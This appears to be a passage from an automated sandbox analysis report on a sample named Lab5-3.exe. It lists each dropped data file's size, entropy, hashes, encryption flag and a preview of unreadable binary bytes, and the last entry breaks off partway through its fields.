                                                                                                          Preview:.`.`..F`XS+.{.ky......t..4.FR....]...B..k...c.Ns..n......A........@B1...OGv.Wv......sc....@j.1.R.."................0.....I.p.g.V....~..S\p.L....E....{..A...\Z/.....[.:..........T}K.i.+..d...j1.Oh..]?.yY.`.........t....!..([..#.......w29.bQ ...o.(4k}..;....X.{..R..T..(..qJb.Q..;!..tv1k.0.-5L..b...Ej.I..&.W{G.r.}-h@....'..Lzv.m$.W.C...*..R!)>..%C.K.T.]d.-.b?...3|.D.j........p...BY..BXXs.%"c..`.9.m..D..!....A.F.d[.../d.nO.AP......5.....e&..P4.u:..D.36/X.Fj.d...~..p..6>.;..@....Q_^{.......l..5.G.L7A.....8.z...v.....r....T.....0|.L.iR../..Z..@..~.x...;...}...,#..Ga.......T.HL.....x.)...............'..'........._es...wRn..:...D..i....!.k.1......fu. ..F..t9.U.$.dd.6|]#j.;R.$.Z,....,.n.(.2..t[.,o"..\.F.*.|] !8.A..QroM....L..w..":....l..~.....ZDt.y..nn.........&0....4........#.....\D..y.k.!.G..'.....7...AFWC.J.|:.......f.T8q.`..l.mI<e..xF...N?0.i.w.3.y.t......{.a...J=-.!....t".b....../.0..-.n..z&.Ee.._..."....;K..@k..<s=ng..p.8H.g...q.h~.7.=..:V.N..H).ca
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2400
                                                                                                          Entropy (8bit):7.922468444623608
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:OLSlF4xPduvuN5ZL/UEMM8um0tgXHHfUTid3hBaUoSGFcmeykEdEElU92i:8SOPUvunZLcCmOJGx0uKeY2ElUJ
                                                                                                          MD5:4DA5568DE61851FA219EDB69E02AD608
                                                                                                          SHA1:35B48E87F0C9C5A49182CB69DBFBC66D26F2EC24
                                                                                                          SHA-256:23E259F557CF3E411E5BAD062B20B9654EA9C00F6EBFDAE7274C1CDD286A7D7B
                                                                                                          SHA-512:117CE343810FE5A30DB8311B118AC90AEFAEC6DB98602AD6CC80695E975C01388F5B30AE5FDA7465C163C75234BE07B36A66C534E7292EC8264C42021C5D0073
                                                                                                          Malicious:false
                                                                                                          Preview:...M.7.BVop#..%|.(.7F5.K.yJ..S.b.{.2.s...~^>i...........K.##.....G..X...P.ErW..O.\.r.....T_L...8.eK....."N'f.....V-wRl....0.O:.).?.h. ........zVxb..........Eq<.<=.`.M..k.Z...[;F..d...w.Ax@......^-..........lr;w5.U)9. ..['.*.I............`...^;.*h..@.q..5S....5...c).v.dM.m.z.)..'..<.c..Z..-Yp...G.9F.MO.3..^.'vW......%c.#..|..h]...e...|(...MN.....R.*..CS.H....E.O7.........!N...<.=&......z..,b.....c...O...u..{R......9.[?Z}v^(.....I4.....^...8.+.$0....Z;}t.>,I&}.D...b....?v.....t.i..}.#C..Ir.. ..-"~.!....w...........to..._..>pg....{.....S.....o..A.qe.@....P.../...X.|!..Z......b.Du*!.0O...p.^.x......*vzBz.........z...p."Or.gqI.q...9rD....f(......4.?...j...<b..S.2c_.y.'z+....z>......g^>...yM.........y...}...z..J..].y.l...j....Py.t'D^=R.k.Ts...2..w...2@.'.h.e..;.g...3a....|...Tm.,4}.J..?..`\{..x^.KZX.2@<l#Y.....t`.......h.....i.P..P$.5/i;...Mn.0+....3(.1...~lI...!..e<RO.#D....M6..NP.. .Gh.T..\ (JfB.S.#a...@.a...r.]=.N.....f"..|..z.e..{kR6...$.O
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2400
                                                                                                          Entropy (8bit):7.911156840768349
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:zl61BQ7oF+s8eAgVlQ2F++Tkkoojf1YeHfUTid3hBaUoSGFcmeykEdEElU92i:zl6FFmfgVK2cknLmxGx0uKeY2ElUJ
                                                                                                          MD5:BF379014E428A841AFAF44E9418F73CD
                                                                                                          SHA1:829828DF4EF806CEA21171BD47CEBCECDDE0C57D
                                                                                                          SHA-256:28AB0D3C9D734EA4D6B576437187454E2F035D45621E5FA5A0A2A9161541FC19
                                                                                                          SHA-512:905201D66245870A320ECDB3F04E3A8FAC5075FF988E640079FB09220A9C148C04BBD8490DCC23D240405995A46B18A0D57AB2C65CEC4A8B0A60F6ACE3CE65FF
                                                                                                          Malicious:false
                                                                                                          Preview:D_.-....Qt.b.Z.Y0V......_..7f+..^... ..D....Q.....9."/{L.@.sj...]$.r..G..1....v..kX..j.l....W.[=.....3.v.b.y...'k.}..B.s_...j..Gr...).$p...7...Y.^q'`....1q.Z....-....8{BP.S.r....:n..z.L.#..0x.TA.o..&Q..f..D.....T..D....EZFE-{..,.f4......&~..xK^S........I^.TJ..XUG.l.e...s>...}.....;.X..\.LZ*U}.]..Q.......9..'.$. P..g...*ms.._....u.....?s.}..y..+.c.[...(.Q..F%......R...T..5..E.0..c.."m....D......r"....&....d.k.[.9...{).tK...0.W<.E..=S...\".Vm._.j.V..1.jn......vl... ./....7.Y...,...q..0.}.4."9..89>.Z.Yf6R.sW....O.(...^...SQg......!v..H(d...N.X.....{..6{.....!.v.x...V..q/..V#..<3.,o.j.X..3.B.R..>w.%..@..B..VZ.C.:.....O.2.O.......pA.........t.Q.6%...s......\..N.W.6.0m..e.;......l...J3\.O?u....Y......lJ'..U...\.s6....0..3.#..Ho..H{F....g..*..=.Z.{........:..U.N.3.\..t%..>1.....h.R90.oI.k~z...d..H..s%....Q.ztTWJ.l.Z.J.76,.M}oqdDEE...D..%..z.BC.E.cL..^^n.l....]....=5.Y.#J.Q. ..t".........J.M..}Fj....1...F..........h...#5..B7....c&Df....p.B....!.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3584
                                                                                                          Entropy (8bit):7.95105413195816
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:2kT5d6sTS1WT7gF1oxtiT4uGx0uKeY2ElUJ:Tj6s21aWCxtf0Cb
                                                                                                          MD5:B56DF8E026693C93D8F0F183E4A31605
                                                                                                          SHA1:FB366C3AFB4EE8190D142BA7D683DDACF51F1FF9
                                                                                                          SHA-256:819F29791748BAD1ECB11FD4D3D6A7B130D608BB3015BC94276B8CC1C8472B96
                                                                                                          SHA-512:FD5300DBA4960E54E09A90FD275C96C35A97DBF0ECCE1F305191F95376B5BA05BD994805F9EA65710E968B34EB69F8889323A6D3AE11AB74830578EF9C8C8D6D
                                                                                                          Malicious:false
                                                                                                          Preview:.$.....;.~..3&I...<.........).......\W....3.....;..H&..B.%-M...y.....2j..|..xYLf0....=..kZ.2U.A\..J.S.....r..........Nt.f{..'H..C...12]*...q....B...0....o..eA.z.H<mY...u3.cI....S%.<.ml...qDx$..Q....w[U...f.J..Y.P.`.H.rg..E...l\X..5u..b..h0.^....5!A.&...wk.b.c..,nHf..!L...N.._CI.Z.....q3....Y+..D?..<....[|+.a7...E.X..a,j...qq.(.4.,.T.N.j...iS...Z#(.q..L.x/.{...;D..':,...&...r!.U.."].W...2..!...N.KV.a'...E1e]....0.T........^.P..)...i..E....N.X.Xd..Ti.@...'D2VR....'Q.3..Ec..E.(..ce....;9.TJ}:.yC...,..oT.P&f|....Qj....J&e.q.{.jv...W..;E%e..3......74..n@.Z....I.z+.m6c.S..t.L....~3.G....Sb........9.G..%...v...#.....I..G....^...(*...th.x..H.....F#..M.<u.vG..<o3\..eW..?n..k.3....F,.$...G.>}4.v...'.:U..xS...U._.....e1.zR2B.+.d.AL...)...M:....v n..b..eL>..s+.J........`M......:Ota.l;g7...UJ...gd.Z.>bc..HF)....D.M..6\E>...|......j....+.}\.+Z.x.R%.i.%@......\U.KkS..C/.}......W..rG*b....L..m..D......$...U..P.^QE....4......76.B....O.u._..R.....v)..L!.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1984
                                                                                                          Entropy (8bit):7.907630029767063
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:k3cX+CdmLaG33EomHxPhzHfUTid3hBaUoSGFcmeykEdEElU92i:q8jdmLaGnEoMxPhAGx0uKeY2ElUJ
                                                                                                          MD5:91707118D1E72430C2B068370BC35E32
                                                                                                          SHA1:81668C49B667FEE8A4B05488B28E6E67CD5AA370
                                                                                                          SHA-256:AD7028FC678EF2D865641ED3406E20FB3ED095DACB19605CAECD2E5B601FD4CB
                                                                                                          SHA-512:2355E4F51E18F38D67F9F4473DD0E0BA66C7C47D1A3484EA71B2E86BAFE1E0283BA9C462EC2A8BB314F095A93C72F689F76A4A22BCE95A889B91618BFC31C770
                                                                                                          Malicious:false
                                                                                                          Preview:Q.kd2:.s....r..N...V......)....H.....6.h[...^.F...T..,..2O...(..lz...l.;x.....c.S"wU..y..(...DNU..B...[...zU.|.!.9R.q.~.}+..)...3.-eU#.kM...h]W"...D.~.~...vh~T|....!.[,.....r...{.K|..}A......ie.S.H.......v.T......m.(...]..D....)^.......#*...X6.1..Q.....(........&..t.a.b.3*+...U.G....b.j.7?.T]!@...UB...|J....>.&@....-.(*D....u.\'..B.Z.wZ.7.3..0.S..0.L... W&.\O.j.Vr....{...5.L...D0.t....Me....f..H....c.W.|..r..bf.H*.R..#..Pd.@*.^...4.M........\.8yMR,0Yb.\_ct.8.6x.....WG.H.....:..:V......`:.1}.GEF........._0..>..<.C.9....''.......u..........3.Q.[}T..~..kW!...:..D....h.....0.O|a...>......9.9.'Ou..O...Y..^|.c....)....g...~TM.^.M..(.d..Ph....}..w.).&.xq..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2688
                                                                                                          Entropy (8bit):7.933893546449916
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:LYzrL3ZWFggULI1yL5s4zkIKoLsHfUTid3hBaUoSGFcmeykEdEElU92i:LY/7ZWFVU01yL5s4nXPGx0uKeY2ElUJ
                                                                                                          MD5:198195FE886BB6934FD51FF72BFECEB4
                                                                                                          SHA1:0888B1CCE323632A58AF0386A6D5B182A3D77D4E
                                                                                                          SHA-256:79328EC365EE98ED369491D5A25ECAA9337973F1EB81C04DC4A574208CD13F7A
                                                                                                          SHA-512:5DF52E6C646E92D93BA3D5353B9BEEAA0DB7350D57E5AA4E3C71BCD240388DFDC386DE17010D835E29CB21B37589337916FEDE453BFCC349911EABD1A62122D3
                                                                                                          Malicious:false
                                                                                                          Preview:y.U.r.RN.y.....I..q.1...!.e5...U.).{.....0F....A.?X...6.^..L. .Y.7..$........iIK.r...$.._..m....!...g.....Kz....<.n....k...J.#.s....TZ..OnaI..Z.i..i.....).L....P"..n].%...,O$..x..Q...m].ZF.H..xj....B..X.G....#..o.Pc.9s.v#b..x.:$U|.@+.. p.D.....3u,.l.... IhBhWj.F/.....[.\.].....5.v.....Cy.}...}.lAk..X..sEW.$..RxU..d..|/.Jj....<)......`....*...^.|.W..NO#..|.E*o.z}.C..V.)..]....v..{d...:B.d.9:mZB.Gzq..........U...b..FAu...o.k.0..4.0.&..+......7M......n..&..=...S.w..w....Q......a....+....T ..Wtn.E..s...8.!..?~.J..........:.O....l..w..4.@...}..f....)n./...\7. .W..v.1....^..G...M.BCv..h9...G$..H..p.9..GQ..9..s..........C.c.<I...No...H.. ....;...(..~.d...0\g.b....5.0..o....F.&.v.u....niq)a.R.g_..|.....hLs.... ....o...z...."DD...]C.OX....J%"T....%.6...(.C...DD*Oa..g...F..X<.=ZU...yK..^....z.[.I#..$..BO...*...._.K.H[...7p..(.b.8D.@:.7.!...H.+-.9.R.....w."K<...%..6.!].3._=..K..ke..1.......h..IC...$..#{..*.h.x...g....BV.g..d.e.bpps5....\BJ....6....l
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16192
                                                                                                          Entropy (8bit):7.989371700982187
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:3gyzOzhacd1HxJvsDwXWs+FHTyFh63zhYq+RKHd6Z9gLhBYQtb:o1thX+RWhmhYv8HdM0hBYQZ
                                                                                                          MD5:657F6D5F59C481A6AE1F2079CFB0DFC3
                                                                                                          SHA1:3BE9395D3BCA81A784EC5E4D582E9CE9704CFD12
                                                                                                          SHA-256:07CF55E257594C778E6B20A30A54ABE4474C8C3D1B89D08F4513D311DF1F57CF
                                                                                                          SHA-512:B5EA8957E6DE255EA56B393DC44A4C6BDB290376A91D21C6DE66ABDA9DDB8FFC80F29E827436225F060396FD6A71D3060ECBA14B097BD74D70D43B52C8A01D8E
                                                                                                          Malicious:false
                                                                                                          Preview:...r..;. ..~*(o4...=p..@/.....r.`....[....W....@.1...a.^.])v..m!.GU..wW.`^.7.wK...0.b.S.Z.z..r....&.D.._.h^.+..i6...[.:5[B.[..W.~.1............n....z..... ..n,..y...W ..L...c..=.u.!|c.e.zA4...Wh.....K..JJb.!. f..h..f....u.4.9......._.....'....;.g...BU.......f#..H....{......9.M.4:...+b..@_.%.Cy.T.s.].*A...3.........T.....C.>.),+ ...mR...~....;..C.7..F....T.....E._^.gj....1..JF.3..56t..(a\.U....]./.+..I>.hJ..,_..X...@_.I....N..)zm.%.+e.[+..<O.3;.l|.U..S..A..*...6.....r..|...:..w.8Uy%....+G2+.<!....c<dv.L.e.....MM24....R.......L....T............#....4.T_...Mr.).8T.o. K:..#.u.fr^...`3U.S..3..+g..hdN...J.l.b.ri.2w..6;H....v./s.F..."z{(.l...J..3n:..@X.M.......<_....^e....[{VFe......A1..c......1........`..v..sefM.._.._.l$......:00.....p..L.n..6R.;./.I.........gQQ...L..ZO-.....6.}8..1*bUs.t.G.............Tb..@...6.K.<....5G......VT.?..-./..,j.%.....#X4.cm....B.u4..G...7...l\x.<~E\..7...G...:.<....u.....O..........K........Dv.....p.t/....-.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):39056
                                                                                                          Entropy (8bit):7.9950083750871785
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:2An40s8jdx+Ue+bwK26oj31JCpxFPXusNPdJHhfHWe4ImWMYccZ:2A40s8jdGUxklQXPXusxq7YBZ
                                                                                                          MD5:018E48FD80FD38A1F739CDDEEAC7EC2D
                                                                                                          SHA1:CA48DA4ED954ADA630CF6B6923CD0F7C0168B9A6
                                                                                                          SHA-256:49A62DC449A14076CDBFC343359EA34FC1F3C2D9CCE339CFFD8FA9496AA5AA10
                                                                                                          SHA-512:5B12C4CBCE41D90904A9BDB2FFAEB8136C6B266D5DFCC976C61026F7E836619854884165C1134ECBE2EB1EA68AF1026F32B71D816A741CA80E8FE2F8DCD212D9
                                                                                                          Malicious:false
                                                                                                          Preview:..'....|.....%.n}..6....".....R...I.....i..(...%..]{....z.J...\......ld$.=..vIL...p...r=....s.........V...ze..d.M.A.....cMnH..H...i!..ks.Y.3...a../".V.6...X....h..t..(2._.H.9^.BE......H..:..{.Ua....s.D.$[..~......^x..(YD<p6.S...$!m.xo`..Ub"x.....~.C.<.P.....Ib..~..:...*...!DYJ>...P[...O.l..'.r..1#o.6.....<O....i..!.M....MGh..ABY.>. .....E].y.o~"......l.F.o...0.d. =...$4...w.N.......&...;..9.>.mU.9:..0.;x../..N......K}q.=].C......]Ro$...m.xz..BC....y.=.."..Y....K...K....#...5.p....... .|.s...9.A{..$.....o:.p...r*#[C~..)@.Sc..0.Z..#...I./.~.U.kHrg..Q........=.Lyi..s..:,.)......].ukfW....N..p..*.....&..y.({t....2Gi...v..WrA..........tl............m....Q..?.+Ff..........J....%k...`.TQ.Ayl:.p.Hw......a...,=5...c).K.........9..$U.)....B..S.c.h..-P....m8....Q.h>E.+...6._.{.}...K^$..c...cV$=p..O.z....U....$..t...Wz6...&3}\...0w..q...!.!.v....1<..f.......>.*qf...>.RP.:..>..rHs....[..s.F.V.E..........81...........g.of....1...:..@.F~..D....|.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12352
                                                                                                          Entropy (8bit):7.985442310043772
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:SUt2P909uPHfiZLgcVuzzsndBNnqh1kFtb:SUQRHfiZnI8dBNqLkFZ
                                                                                                          MD5:E32C714BE0D98D915C486C619DAA6FB4
                                                                                                          SHA1:9BF512258A62EB76625449DAE4F0CC999AB3D9A9
                                                                                                          SHA-256:290C0263723E000A887B6B077BC7EFF5FE53E7F501F720F0C3CD2ABF1D187F2C
                                                                                                          SHA-512:441CBBDF7EC12BFEC23CD72DB11881A0B4B0E32E750845587BD4C5C9F2AB0568F6DE25998CFB235F96ED1EAC780E4F62932271482F1F4ABB21701AED55075A74
                                                                                                          Malicious:false
                                                                                                          Preview:....#.'.B........Bd....ck0.Kn.@..m....V....a.\B..L.)j......45%..N=2X~R{...}'d.n.....s..{}p./....2.w.g.e7.:..Wn...EE.V.P)RLbv(..Hq:HTHG5.gqH)...z._r.s....R%....8(I9...6....4y...J..)......o~X..c.....?..j...nI..u...u1..4..*.....D...E.....$f.......G..^...DN.iUujN.<9zJA[.y$..Rjbt...b......)Z..z.86>w.f.Ko..t<...]...`.........^.O .7....9..s..+XI......9..M.........(>..8.x(]..U8G..r.....{F.^....}..p.....D..KOc._..U."g~[h.0...x.J...j.6!....(F~...Q......pl.w0w.R.............Mr...\...........v..D.....VE..j..p..G...k~8.B l....T.F..E1.....r..=[CA...EsH...........fp$..e40.8.m..+..c.<jt..R.d)rW....\...>..=)......u>..^.P..}~@<.q.0...Y....0r...F...v.U].I.............h...3.Gy.m.....:.f...#I.op.`Q...N..G@'...P@..VB....D..?...^.%m..R.@.w..&....|.Ql..(..F.cxNX..J!..T.|.*..*..........5.d.o3.....z1..4.I>d.=+.m.JeBW#....a....8...,=.;....].h.V..4..s\..'....M\.|.Z.:.....h(..6b..e.9G..a..@....%..D ...8..I.Z.c...x(.|..D.j.<..\;>$.t...=..sVl.K..E_T......}.d...-.$...mua]
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):28864
                                                                                                          Entropy (8bit):7.993370957876935
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:384:T0wJ+iNTKxUOSku9ExUsb8rnr2W1Fsr8vnwLiKx0swIEbawGMM5LRndtb:TxJvNZOSILonr2WftI1x0swIE83dndZ
                                                                                                          MD5:665A435ACF352C03906E073CE4FE8FFA
                                                                                                          SHA1:88AE7E2530B62C8C1A990F61EF8C0F44B269B0EF
                                                                                                          SHA-256:40BA02F26575E7E305649F5C267931D343E31EEBEB3ED5A3AC9F14695248D42C
                                                                                                          SHA-512:CE63D4EC433BF6C9DDF8B7932EBB3E30DFB8C1505E9F5F97387200E251A52C8AB2762DA7099D5CC5C4D624A2B9F4E1D0732B69713C68B5DBC7BE0AF4F9E1BD71
                                                                                                          Malicious:false
                                                                                                          Preview:..k...._Q.4<...=1p..C.l........Yjud..^FL..t..Y.s./....(...G..`.;p..D;..:......x.V..h...HA.,v|...LA).n.W..q..y.p..7.E..8.r........XT..{:<1.h{....o.,.sE..m...{.j...L%u^...A.$X.<.......m..8';w...\..w....,.M.:.....U..f1..C.q(82..jf.....iE..q.(.....U..n....j....J.*x.`x..)l..I.w|..tS.Ao.+.E\be.#.`..P3..\.......%eQn.uW..V@.?=:.GA!.?...Z.lsTF...I:..|.v..^.3.....{.q...&..X{)...C..x06.s.-..T........{q..7q.....Tj..V.....@0...D....X.......Nm..;u.'..Ej]L...Qz'.2.m.).w.-.....&.Oq.........K..p.v.Xp..h.......<>..'.._.I..:.p..0fyb.E.d.......oL.|...o`.V..q.^..(c%... j..h....}..q\....k.NB.AhIOS.-.;.x..~...Y..8Q.1.^...i9...*.(.....K.......h..........r.5.[.Z..r...V.....hF).[]-|.m.I..?@@.gc.......&.~..N..m......4P.Vg&+...M.*.#..YA.~.Z..5.r...+9.....^......,.^...!=.$..ml.....J.kf$7x2.{i..j...X6%...........i....=..\..;..o.i......r....[.e.._..D.Q'}i.%.....}..a.^......%..d.....7.M..qu..z...Q.AOd..eC..-.\|#..Q..(SS...%...7\g.m}..(..;j52.5..L.9.T..jV....U
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2720
                                                                                                          Entropy (8bit):7.934454712951698
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:6/K//aSUfmrMs5nZzsZGJZfk/tHqvq3vHfUTid3hBaUoSGFcmeykEdEElU92i:S9SU+LZGGJRk9QdGx0uKeY2ElUJ
                                                                                                          MD5:109B8A8B05DA7DC21F31646DCD8228A3
                                                                                                          SHA1:65253A0E1F0BF8D23F228662FA9D492641B83BD7
                                                                                                          SHA-256:08CA6152D73614B26C5CECF29E2575A086E1797059F5C7821B7FA01F3E2D6851
                                                                                                          SHA-512:468701EC71CAB0D42C29126AA7D004512D7134FE3F7BFA91D2C64551022964E9D9913D9C5C1D6A9232DEFC641C850F42E053C44F553680769ACA6929F6334A63
                                                                                                          Malicious:false
                                                                                                          Preview:.n...W.U.......a...,..j....6....Ej........S+..O...N.e7.t.k.=bc..........[FE.......pam..A.%..`N,...6..y..'.."[....3.w....T.ld.......&F...O-2......*..{...[.i..G}zB.0PV..b...O....,..-..i...f..!.>.>..M6<..<..zb....m#@p:..9.....DcBR.L8HW.....1........V.6.SP...TI....j.c%.g46....Z0.....@T...pYOND1.6v.... W..f'P1.`_3.{o..Z.....A....~mj.*.._.5...i.c.J....6R.yi....a..e.w*2....WY.....,.......;}*.D|K......9.....OJ...5.....)...+jt..|......,p..<.:2`..c..Ve..5....2.. ..-]...[Q.kn2I/.i~\.l.r.6..Y.......pB`.......v)..IT.2...A.D.J.R./..;U..K.h.W4U..b..(.0.S....-......N0...)....|...........B.%.u]Y..d.v.b..\...s(....0...d...H;=......z.MC"\..r5......./e.....7Q~%.@..I.2.<.c.f<...V.~.A.h..i..[...E..S}c=^..\.Yc..d.Y..m}>|qr.....(z.}8......i_.a.....?j......~.x9..4qt....-..5k~..)8.o..+..FX. ..R...S.%...K.g..oO.....S.;...;S.T2ketc....2.Z........J....`.NI.:......p...(..QF.....I......8.&>..x..V.Q?....i...d|.U..q.<.kTg.(.%..... ....%..cO/8.bl..;...4}..eF......5...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3184
                                                                                                          Entropy (8bit):7.942862508971289
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:NkLGJQ1PjnDowt+1j/tyMGx0uKeY2ElUJ:SyAPjDowtYj80Cb
                                                                                                          MD5:F566734D547933D723EAE3B1797300EB
                                                                                                          SHA1:1305051EE0BB6FDC5B23880ADF3D1C0E5E060ABA
                                                                                                          SHA-256:EEA81329A762CF6D6F6F5DCF01432D85658C8E3234035F989EC08DB54D1B9C13
                                                                                                          SHA-512:8C9AACAEBB46AF2C61809029AF2B7C1EC8C11120FB38B76015A94EE20955032441DAC4DD8CD27F94032F315404397C19AFB3B7C78434059811F53A67DA3879C2
                                                                                                          Malicious:false
                                                                                                          Preview:#?b'.....S.e....o.6.2....?..[...Ax&=...k6.fkB.+.h...4k.'<..4%......VK...-.*.XQs,8..p%..mD.!.Vm[...].-..'8...W.d.Cc.h}.{....c..kb.$...Gxk.J.};.1.r.Bw..y.b..'...x.......Yz...(..e\%..=.WP........41.W...b.x...r..RJ....n....(....`..C........R^Vz.f.@.....N9R.5.| .5!....8M..w0{..mQ0..\d.3...b|..<.Afc3.F.].....8?...%=V.vps..f.o.LY(.e=.hEj ....XQ.UQu.>....6"....PG.I.5*.P...qP5B8...v.....8bhh.dGC....B.@~....B.M^g..L.....s...~...E..M._.5qu\.....2.~...H.o....-[f...D>...f.,..#.-F........F.`..-II+.c......./Q.J7.$....kt...~..C.+..R....r.......uKeMv.U@-..c.R....~.+..U9.....L..>.r.K.......OF.E...u.t...?...wH.S.V.c...=.4}..:z.\c\....?M.h..m.S. 7..I.oIe..R.F.boH.Z.p.}.(`....g...\&...n......N-......f&...S.a.5r....c..I.@.d4.$.U<&T.7..q3...q..=...../.S.....Ayq...5B..o....w..}+...~...p<.DZZ..`.>D..../^.#.....:_........p....J .:.V4@>k......Z0.....7....).(.....d.IY...)u..7..........q..F.d.....W.h.xM....9 ...5s.$x......p.N.>...Y...x...A.5....{...`+.35vOoS.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2480
                                                                                                          Entropy (8bit):7.924300050659908
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Kxc6Fep1Z//EQ4vhW33TKTiALxHfUTid3hBaUoSGFcmeykEdEElU92i:Zfp1Z//OWnOT5yGx0uKeY2ElUJ
                                                                                                          MD5:7592088609EBD46983E406EC1F3849AF
                                                                                                          SHA1:C1F6CF5EF4E890F3F72125F4AC21827B917B770A
                                                                                                          SHA-256:EF19217A68B17FE6AFEE6676C1F6CCC15DF1E8A04E91BD80C410494785D03749
                                                                                                          SHA-512:4560C5152924035CD3609619EBC916413B66DD388FEE7A2657A092CCD0F112CA584BE6DF6514BF08A0B3E11846CFCC81654ABFB2A49F24B138C4F82449255D04
                                                                                                          Malicious:false
                                                                                                          Preview:.'9.........tbt....e.r...ZxEO.&BO..FG....FG...].V...Mc.^..c...)....S1.....>%..*Xi?.@.........G......kx\..^.E$....i..Ja...Ff..I@..!....=........8^.#..C...XP.,s=...m.....k.;.+m.....i......sz..V-...T....e......>.-......]v.^M|5..,.1...s...X.pE{...6_..(o...#IQ.Y...;\...........:../.Q~.v.....#.....P^.0._Yo.=U.S_.LFa.n.D.{..]....}p.A.@4\...s.d*..9b..~*.:C......@9n...........>..>.V8B..x.hvN....~.o..p.D...........X...E..Yk.B.#,M0..`x....v.....jE...K..3..b./...x!.Md......D.r..f.] ..S?../V...N?....;.G.uE...2....~y..9w.3#.p...._.....4..o.#...%._..yj.....r+W....?.8..6..)...qGb..VbE......C....3.&..!..C...5..v.<.69......\.....8.x.tO.....i....Y..q._...&.f.2.3".T...L...{fc$uC.M@......&....Zck@CDq..x.t.)..6.+...K*....F{<)..a....u..eJ...y.3g.gMN).5o.....+...e..Cn......"c...nz..u.a..I..'...$...XZ.3.|.jW.*P.....Jok....>..Ni....R.3"....d..q......W......=B.W...V.bZ..........\....v.^.....]c#{P....c-y.m...5..Lt.LIUi$.{...,.Q}.&....7....^.HK...Z..Nu.".....,LB[.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2672
                                                                                                          Entropy (8bit):7.9300526314348225
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:IXIMyiu2/CfGOp6lWArMQ6rqHfUTid3hBaUoSGFcmeykEdEElU92i:wIu/CdExr0rFGx0uKeY2ElUJ
                                                                                                          MD5:EFF2C583D9625B8F94FE93D1710049E6
                                                                                                          SHA1:65A5149BDD8F08DC6B215F1FC316BEDFFE2ABF22
                                                                                                          SHA-256:2A5492AA9A021B9DAF3C0C9CCC7085E2A128BFA53ED654FA5E4AD2480ADE7B4A
                                                                                                          SHA-512:FC7C7A52BE0614DB46531447031925259864884E00D37ECC3AF168AA5DE4F450C0EB2E83D207CBF3095E03B6132571001B17473B36062CE7CA5D0DF000E34CDF
                                                                                                          Malicious:false
                                                                                                          Preview:..K..et........y..)...0V...B.>,.Y....v.T.l.5|....[......f..g.*....DZ(.}\?c...5&.-y.....B..N................./..H..:;..........q+mb...n..5.v..%....b.....@*i.U.H..)D..............z.2.MI...~c5YSO.....u,.D'..P.K..c.a...QYx..._.DS.GG....&fy...8.....=^...p...{V.....!.w.....$S'_..U...!......!B...\....X.7.PE...-g..G.t..%.4>.....LD..+c.O..G.@.."lx.!.M(....og..!.I........}<6..`..[..:.Pi.....P.]N..w?..8wD.....$..^Ud...c+......`..Z..1...M.B~,/.d.=.d..!..S.p...?..kI.|].z8...#....Jk....f}..y.t{...^......Yw.Hn&t..n.1..$.&Le....{.....<=h..Q]..&iI;.=~......!@..z..5/W....K......fl..9.4...C..2....P+.!.o....J.&cwg!..E.'.DI.}...!..F...u........}..$.....;..[...{#.........Y..E..%...'.H..R0.IO.c..D...k.....y.]..).O.hD.h\>........!G..D...%.c...F]RXu.w.$5`7.N..._cQG-.5,....6...f..<...+/R.........V:...&.....ca.J..C..."r.jW...C.g.3.X...W.a....Xs)p.q..Vf..]a.Jjh.. ...Fq..m..5.!..V..H5%.Ld....]...19.0.O..../.?...~Bb=...].?.s(.:eo.....6.qH.o............t
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2960
                                                                                                          Entropy (8bit):7.934254560017679
                                                                                                          Encrypted:false
